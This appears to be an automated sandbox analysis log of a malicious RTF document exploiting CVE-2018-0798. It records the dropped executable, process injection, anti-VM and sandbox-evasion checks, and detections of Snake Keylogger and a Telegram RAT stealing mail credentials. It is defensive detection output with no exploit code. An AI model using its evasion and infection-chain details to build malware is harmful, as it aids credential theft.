Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002693D0	6_2_002693D0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00268239	6_2_00268239
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00263000	6_2_00263000
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00269818	6_2_00269818
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00261A48	6_2_00261A48
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00266C57	6_2_00266C57
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00263459	6_2_00263459
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00261EA0	6_2_00261EA0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00264EA8	6_2_00264EA8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00268693	6_2_00268693
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00260490	6_2_00260490
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002608E8	6_2_002608E8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002670DC	6_2_002670DC
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00267530	6_2_00267530
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00262300	6_2_00262300
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026D300	6_2_0026D300
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00268B10	6_2_00268B10
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00268F6D	6_2_00268F6D
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026A979	6_2_0026A979
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00260D41	6_2_00260D41
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00262753	6_2_00262753
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00262BA8	6_2_00262BA8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00267988	6_2_00267988
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00261198	6_2_00261198
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_00267DE0	6_2_00267DE0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002615F1	6_2_002615F1
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_0026E5F1	6_2_0026E5F1
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 6_2_002693C0	6_2_002693C0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: arinzezx[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rinzearec84736.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

ReversingLabs: Detection: 20%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\rinzearec84736.exe C:\Users\user\AppData\Roaming\rinzearec84736.exe
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process created: C:\Users\user\AppData\Roaming\rinzearec84736.exe C:\Users\user\AppData\Roaming\rinzearec84736.exe
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\rinzearec84736.exe C:\Users\user\AppData\Roaming\rinzearec84736.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process created: C:\Users\user\AppData\Roaming\rinzearec84736.exe C:\Users\user\AppData\Roaming\rinzearec84736.exe	Jump to behavior

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5FCB.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winRTF@7/6@2/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: rinzearec84736.exe, 00000005.00000000.907194181.00000000009C2000.00000020.00000001.01000000.00000004.sdmp, rinzearec84736.exe.2.dr, arinzezx[1].exe.2.dr	Binary or memory string: insert into User_Transportation(UserID,TransportationID) values (@UserID,@TransID);
Source: rinzearec84736.exe, 00000005.00000000.907194181.00000000009C2000.00000020.00000001.01000000.00000004.sdmp, rinzearec84736.exe.2.dr, arinzezx[1].exe.2.dr	Binary or memory string: insert into TourPlace(Name,Location,TicketPrice) values (@name,@location,@ticket);
Source: rinzearec84736.exe, 00000005.00000000.907194181.00000000009C2000.00000020.00000001.01000000.00000004.sdmp, rinzearec84736.exe.2.dr, arinzezx[1].exe.2.dr	Binary or memory string: insert into User_TourPlace(UserID,TourPlaceID) values (@UserID,@TourplaceID);

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: 6.0.rinzearec84736.exe.400000.0.unpack, ?u060cufffd??/ufffd?ufffd??.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 6.0.rinzearec84736.exe.400000.0.unpack, ??u00be?u05c3/?????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.0.rinzearec84736.exe.400000.0.unpack, ??u00be?u05c3/?????.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0059C27C push eax; retn 0059h	2_2_0059C27D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0058F89F push ebp; ret	2_2_0058F8AF
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 5_2_001D8A63 push ss; iretd	5_2_001D8A64

Source: initial sample	Static PE information: section name: .text entropy: 7.5995313133783124
Source: initial sample	Static PE information: section name: .text entropy: 7.5995313133783124

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\arinzezx[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\rinzearec84736.exe			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 5.2.rinzearec84736.exe.226663c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.2249628.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.923783682.0000000002498000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.922046499.0000000002241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: rinzearec84736.exe, 00000005.00000002.922046499.0000000002241000.00000004.00000800.00020000.00000000.sdmp, rinzearec84736.exe, 00000005.00000002.923783682.0000000002498000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: rinzearec84736.exe, 00000005.00000002.922046499.0000000002241000.00000004.00000800.00020000.00000000.sdmp, rinzearec84736.exe, 00000005.00000002.923783682.0000000002498000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2948	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe TID: 1196	Thread sleep time: -38122s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe TID: 304	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe TID: 2652	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2212	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Thread delayed: delay time: 38122			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: rinzearec84736.exe, 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, rinzearec84736.exe, 00000005.00000002.925088614.00000000049C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: hhkxlO3QEMUbiR61Vmc
Source: rinzearec84736.exe, 00000005.00000002.923783682.0000000002498000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: rinzearec84736.exe, 00000005.00000002.923783682.0000000002498000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: rinzearec84736.exe, 00000005.00000002.923783682.0000000002498000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: rinzearec84736.exe, 00000005.00000002.923783682.0000000002498000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe

Code function: 6_2_001C65A1 LdrInitializeThunk,

6_2_001C65A1

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 6.0.rinzearec84736.exe.400000.0.unpack, ??u00be?u05c3/?????.cs	Reference to suspicious API methods: ('???m?', 'MapVirtualKey@user32.dll')
Source: 6.0.rinzearec84736.exe.400000.0.unpack, u05c9??m?/ufffd?u060c?u26ca.cs	Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe

Memory written: C:\Users\user\AppData\Roaming\rinzearec84736.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\rinzearec84736.exe C:\Users\user\AppData\Roaming\rinzearec84736.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Process created: C:\Users\user\AppData\Roaming\rinzearec84736.exe C:\Users\user\AppData\Roaming\rinzearec84736.exe			Jump to behavior

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Queries volume information: C:\Users\user\AppData\Roaming\rinzearec84736.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Queries volume information: C:\Users\user\AppData\Roaming\rinzearec84736.exe VolumeInformation			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 648, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 648, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

